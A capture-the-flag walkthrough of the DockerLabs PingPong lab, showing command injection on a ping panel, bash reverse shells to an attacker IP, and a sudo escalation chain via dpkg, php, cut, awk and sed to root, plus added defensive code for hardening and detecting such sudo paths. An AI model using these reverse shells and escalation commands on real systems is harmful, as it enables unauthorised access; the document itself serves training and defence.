PINGPONG DOCKERLABS


First of all, let's solve the PingPong lab on the DockerLabs platform.
We deploy the machine with the command shown below.

┌──(luis㉿kali)-[~/Descargas/pingpong]

└─$ sudo bash auto_deploy.sh pingpong.tar

[sudo] contraseña para luis:


                       ##       .        

                 ## ## ##      ==        

              ## ## ## ##     ===        

          /""""""""""""""""\___/ ===      

     ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~

          \______ o         __/          

            \   \       __/           

             \____\______/              

                                         

 ___ ____ ____ _ _ ____ ____ _   ____ ___ ____

 | \ | | |   |_/ |___ |__/ |   |__| |__] [__ 

 |__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]

                                                            

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

Now that the machine is deployed, we run a port scan to discover the open ports, which are:
  1. port 80(HTTP)
  2. port 5000(UPNP)
  3. port 443(HTTPS)

┌──(root㉿kali)-[/home/luis/Descargas/pingpong]

└─# nmap -n -Pn -p- --min-rate 5000 -sC 172.17.0.2 -vvv

Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 18:48 CEST

NSE: Loaded 126 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

Initiating ARP Ping Scan at 18:48

Scanning 172.17.0.2 [1 port]

Completed ARP Ping Scan at 18:48, 0.09s elapsed (1 total hosts)

Initiating SYN Stealth Scan at 18:48

Scanning 172.17.0.2 [65535 ports]

Discovered open port 80/tcp on 172.17.0.2

Discovered open port 443/tcp on 172.17.0.2

Discovered open port 5000/tcp on 172.17.0.2

Completed SYN Stealth Scan at 18:48, 0.93s elapsed (65535 total ports)

NSE: Script scanning 172.17.0.2.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 1.85s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

Nmap scan report for 172.17.0.2

Host is up, received arp-response (0.0000050s latency).

Scanned at 2025-08-11 18:48:29 CEST for 3s

Not shown: 65532 closed tcp ports (reset)

PORT    STATE SERVICE REASON

80/tcp  open http   syn-ack ttl 64

| http-methods:

|_ Supported Methods: OPTIONS HEAD GET POST

|_http-title: Apache2 Ubuntu Default Page: It works

443/tcp open https  syn-ack ttl 64

| http-methods:

|_ Supported Methods: OPTIONS HEAD GET POST

|_ssl-date: TLS randomness does not represent time

|_http-title: Apache2 Ubuntu Default Page: It works

| tls-alpn:

|_ http/1.1

| ssl-cert: Subject: commonName=example.com/organizationName=Your Organization/stateOrProvinceName=California/countryName=US/localityName=San Francisco/organizationalUnitName=Your Unit

| Issuer: commonName=example.com/organizationName=Your Organization/stateOrProvinceName=California/countryName=US/localityName=San Francisco/organizationalUnitName=Your Unit

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2024-05-19T14:20:49

| Not valid after: 2025-05-19T14:20:49

| MD5:  9ba4:3106:4c16:47c8:dc44:cc43:9e96:b3d0

| SHA-1: 5c55:1ab3:9e32:5498:c454:8eb9:e203:a46a:8e7f:bd18

5000/tcp open upnp   syn-ack ttl 64

MAC Address: 02:42:AC:11:00:02 (Unknown)

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.01s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 18:48

Completed NSE at 18:48, 0.00s elapsed

Read data files from: /usr/share/nmap

Nmap done: 1 IP address (1 host up) scanned in 3.35 seconds

          Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)                                                                                                                                                                                       

In addition, we run a directory enumeration scan with the command shown below, and we discover these paths on port 80:

  1. /.php
  2. /javascript
  3. /machine.php

┌──(root㉿kali)-[/home/luis/Descargas]

└─# gobuster dir -u "http://172.17.0.2:80/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,tar,back

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                    http://172.17.0.2:80/

[+] Method:                 GET

[+] Threads:                10

[+] Wordlist:               /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

[+] Negative Status codes:  404

[+] User Agent:             gobuster/3.6

[+] Extensions:             back,php,txt,tar

[+] Timeout:                10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/.php                (Status: 403) [Size: 275]

/javascript          (Status: 301) [Size: 313] [--> http://172.17.0.2/javascript/]

/machine.php         (Status: 200) [Size: 6989]

/.php                (Status: 403) [Size: 275]

/server-status       (Status: 403) [Size: 275]

Progress: 1102795 / 1102800 (100.00%)

===============================================================

Finished

===============================================================

Now, since we know there is a web page on port 5000, we follow the next steps, as you can see in the pictures below:

  1. We discover an interactive control panel.
  2. We enter an IP, which is the local IP address.
  3. We enter the local IP address followed by ; whoami, and we have discovered the vulnerability.
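
The behaviour in step 3 is what a handler produces when it pastes the submitted value into a shell command line. The following is an added example, not the lab's source code (the page does not show it): the function names are hypothetical, and `echo` stands in for `ping` so that it runs offline. It puts the injectable pattern next to a hardened one.

```python
import ipaddress
import subprocess

# Stand-in for the real command: "echo PING" replaces "ping" (assumption),
# so the example needs no network and its output is deterministic.
TOOL = ["echo", "PING"]


def ping_vulnerable(host: str) -> str:
    """Injectable: the value becomes part of a string parsed by /bin/sh,
    so ';', '&&', '|' or '$(...)' in the input start extra commands."""
    cmdline = " ".join(TOOL) + " " + host
    proc = subprocess.run(cmdline, shell=True, capture_output=True,
                          text=True, timeout=5)
    return proc.stdout


def ping_hardened(host: str) -> str:
    """Hardened: accept only an IP literal, then pass it as one argv element
    with no shell involved, so metacharacters are never interpreted."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError(f"rejected non-IP input: {host!r}") from None
    proc = subprocess.run(TOOL + [str(addr)], capture_output=True,
                          text=True, timeout=5)
    return proc.stdout


if __name__ == "__main__":
    probe = "127.0.0.1; echo INJECTED"   # constructed input, harmless second command
    print(ping_vulnerable(probe))         # two commands ran
    print(ping_hardened("127.0.0.1"))     # one command, validated argument
    try:
        ping_hardened(probe)
    except ValueError as exc:
        print(exc)
```

On the detection side, a web worker process spawning a shell whose command line contains both the expected tool and a separator is the event to alert on.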



Now we have to create a reverse shell, and we can use this web page to generate it, as you can see in the next pictures below: https://www.revshells.com/.



Now that we have discovered the vulnerability, which is RCE, we get a reverse shell with these steps:

  1. Execute the reverse shell, which is: bash -c 'bash -i >& /dev/tcp/172.17.0.1/443 0>&1' (172.17.0.1 is our attacker machine, as the listener output below shows).
  2. Start a listener on the port, as you can see below.
  3. If everything has been done correctly, we receive the reverse shell on our attacker machine, as you can see below.

┌──(root㉿kali)-[/home/luis/Descargas/pingpong]

└─# nc -lvp 443

listening on [any] 443 ...

172.17.0.2: inverse host lookup failed: Unknown host

connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 36574

bash: cannot set terminal process group (33): Inappropriate ioctl for device

bash: no job control in this shell

Now we run the following commands to stabilize the shell on the machine (get a fully interactive TTY), as you can see below:

  1. script /dev/null -c bash
  2. ^Z
  3. stty raw -echo;fg 
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=BASH

freddy@bdb0281c8b6c:~$ export TERM=xterm

freddy@bdb0281c8b6c:~$ script /dev/null -c bash

script /dev/null -c bash

Script started, output log file is '/dev/null'.

freddy@bdb0281c8b6c:~$ ^Z

zsh: suspended nc -lvp 443                                                                

┌──(root㉿kali)-[/home/luis/Descargas/pingpong]

└─# stty raw -echo;fg             

[1] + continued nc -lvp 443

                            reset xterm

freddy@bdb0281c8b6c:~$ export SHELL=BASH

freddy@bdb0281c8b6c:~$ export TERM=xterm

Now we move on to privilege escalation: we run sudo -l to see whether it is possible to pivot to other users, as you can see below.

freddy@bdb0281c8b6c:~$ sudo -l

Matching Defaults entries for freddy on bdb0281c8b6c:

   env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User freddy may run the following commands on bdb0281c8b6c:

   (bobby) NOPASSWD: /usr/bin/dpkg

In addition, we look up dpkg on GTFOBins (https://gtfobins.github.io/gtfobins/dpkg/#su), which shows how to pivot to the other user, as you can see below, with this command:

  1. sudo -u bobby dpkg -l

freddy@bdb0281c8b6c:~$ sudo -u bobby dpkg -l

Desired=Unknown/Install/Remove/Purge/Hold

| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend

|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)

||/ Name                           Version                          Architectu

re Description

+++-===============================-=================================-==========

==-=============================================================================

===

ii adduser                        3.137ubuntu1                     all      

  add and remove users and groups

ii apache2                        2.4.58-1ubuntu8.1                amd64    

  Apache HTTP Server

ii apache2-bin                    2.4.58-1ubuntu8.1                amd64    

  Apache HTTP Server (modules and other binary files)

ii apache2-data                   2.4.58-1ubuntu8.1                all      

  Apache HTTP Server (common files)

ii apache2-utils                  2.4.58-1ubuntu8.1                amd64    

  Apache HTTP Server (utility programs for web servers)

ii apt                            2.7.14build2                     amd64    

  commandline package manager

ii base-files                     13ubuntu10                       amd64    

  Debian base system miscellaneous files

ii base-passwd                    3.6.3build1                      amd64

Next, at the pager prompt that dpkg -l opens, we type ! /bin/bash, which gives us a shell as the other user.

! /bin/bash

Now that we are bobby, we run the same command as before, sudo -l, and then execute the reverse shell to obtain the next user, as you can see below.

bobby@bdb0281c8b6c:/home/freddy$ sudo -l

Matching Defaults entries for bobby on bdb0281c8b6c:

   env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User bobby may run the following commands on bdb0281c8b6c:

   (gladys) NOPASSWD: /usr/bin/php

bobby@bdb0281c8b6c:/home/freddy$

┌──(luis㉿kali)-[~/Descargas/pingpong]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

bobby@bdb0281c8b6c:/home/freddy$ CMD="/bin/bash -c \'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1\'"

sudo -u gladys php -r "system('$CMD');"

gladys@bdb0281c8b6c:/home/freddy$ sudo -l

Matching Defaults entries for gladys on bdb0281c8b6c:

   env_reset, mail_badpass,

   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User gladys may run the following commands on bdb0281c8b6c:

   (chocolatito) NOPASSWD: /usr/bin/cut

As gladys we ran the same command as before, sudo -l. Next we set LFILE=/opt/chocolatitocontraseña.txt (the file is in the path /opt) and run sudo -u chocolatito cut -d "" -f1 "$LFILE", which gives us the password, chocolatitopassword, for the next user, which is chocolatito, as you can see below.

gladys@bdb0281c8b6c:/home/freddy$ ls

ls: cannot open directory '.': Permission denied

gladys@bdb0281c8b6c:/home/freddy$ cd ..

gladys@bdb0281c8b6c:/home$ ls

bobby chocolatito freddy gladys theboss ubuntu

gladys@bdb0281c8b6c:/home$ cd gladys/

gladys@bdb0281c8b6c:~$ ls

Desktop Documents Downloads Music Pictures Public Templates Videos

gladys@bdb0281c8b6c:~$ cd ..

gladys@bdb0281c8b6c:/home$ ls

bobby chocolatito freddy gladys theboss ubuntu

gladys@bdb0281c8b6c:/home$ cd /

gladys@bdb0281c8b6c:/$ ls

bin  dev home lib.usr-is-merged media opt  root sbin sys usr

boot etc lib  lib64             mnt   proc run  srv  tmp var

gladys@bdb0281c8b6c:/$ cd /opt/

gladys@bdb0281c8b6c:/opt$ ls

chocolatitocontraseña.txt

gladys@bdb0281c8b6c:/opt$

gladys@bdb0281c8b6c:/opt$ cat chocolatitocontraseña.txt

cat: chocolatitocontraseña.txt: Permission denied

gladys@bdb0281c8b6c:/opt$ LFILE=/opt/chocolatitocontraseña.txt

gladys@bdb0281c8b6c:/opt$ sudo -u chocolatito cut -d "" -f1 "$LFILE"

chocolatitopassword

gladys@bdb0281c8b6c:/opt$ su chocolatito

Password:

chocolatito@bdb0281c8b6c:/opt$ sudo -l

Matching Defaults entries for chocolatito on bdb0281c8b6c:

   env_reset, mail_badpass,

   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User chocolatito may run the following commands on bdb0281c8b6c:

 (theboss) NOPASSWD: /usr/bin/awk

Now that we are chocolatito and have run the same command as before, sudo -l, we execute sudo -u theboss awk 'BEGIN {system("/bin/sh")}' followed by bash -p to obtain the next user, as you can see below.

chocolatito@bdb0281c8b6c:/opt$ sudo -u theboss awk 'BEGIN {system("/bin/sh")}'

$ bash -p

theboss@bdb0281c8b6c:/opt$ sudo -l

Matching Defaults entries for theboss on bdb0281c8b6c:

   env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

   use_pty

User theboss may run the following commands on bdb0281c8b6c:

   (root) NOPASSWD: /usr/bin/sed

Having run the same command as before, sudo -l, we execute sudo sed -n '1e exec sh 1>&0' /etc/hosts and obtain the next user, which is root, as you can see below.

theboss@bdb0281c8b6c:/opt$ sudo sed -n '1e exec sh 1>&0' /etc/hosts

# bash -p

root@bdb0281c8b6c:/opt#
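
Seen from the defender's side, the chain above is five sudoers rules that each hand a general-purpose binary to the next account. The following added example (not part of the original write-up) parses `sudo -l` output and reports whether such rules link into a path to root; the `RISKY` table, the function names and the condensed sample input are assumptions made for the illustration.

```python
import re
from collections import deque

# Binaries abused in this walkthrough and what a sudo grant on each one yields.
RISKY = {"dpkg": "shell", "php": "shell", "awk": "shell", "sed": "shell", "cut": "file-read"}
USER = re.compile(r"^User (\S+) may run the following commands")
RULE = re.compile(r"^\s*\(([^)]+)\)\s+NOPASSWD:\s+(\S+)")

def parse_sudo_l(text):
    """Return (user, runas, binary, risk) for every NOPASSWD rule in `sudo -l` output."""
    rules, user = [], None
    for line in text.splitlines():
        if m := USER.match(line):
            user = m.group(1)
        elif (m := RULE.match(line)) and user:
            binary = m.group(2).rsplit("/", 1)[-1]
            rules.append((user, m.group(1), binary, RISKY.get(binary, "review")))
    return rules

def escalation_path(rules, start, goal="root"):
    """Breadth-first search over user -> runas edges that come from risky rules."""
    edges = {}
    for user, runas, _binary, risk in rules:
        if risk != "review":
            edges.setdefault(user, []).append(runas)
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for nxt in edges.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None

# Constructed sample: the rule lines of the five `sudo -l` outputs shown on this page.
SAMPLE = """\
User freddy may run the following commands on bdb0281c8b6c:
   (bobby) NOPASSWD: /usr/bin/dpkg
User bobby may run the following commands on bdb0281c8b6c:
   (gladys) NOPASSWD: /usr/bin/php
User gladys may run the following commands on bdb0281c8b6c:
   (chocolatito) NOPASSWD: /usr/bin/cut
User chocolatito may run the following commands on bdb0281c8b6c:
 (theboss) NOPASSWD: /usr/bin/awk
User theboss may run the following commands on bdb0281c8b6c:
   (root) NOPASSWD: /usr/bin/sed
"""
print(" -> ".join(escalation_path(parse_sudo_l(SAMPLE), "freddy")))
```

The `cut` rule is marked `file-read` rather than `shell`: it only becomes a hop here because a readable password file for the target account sits in /opt.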

I hope you liked it and learned something new.

This article has been written for ethical purposes.

Good Hack
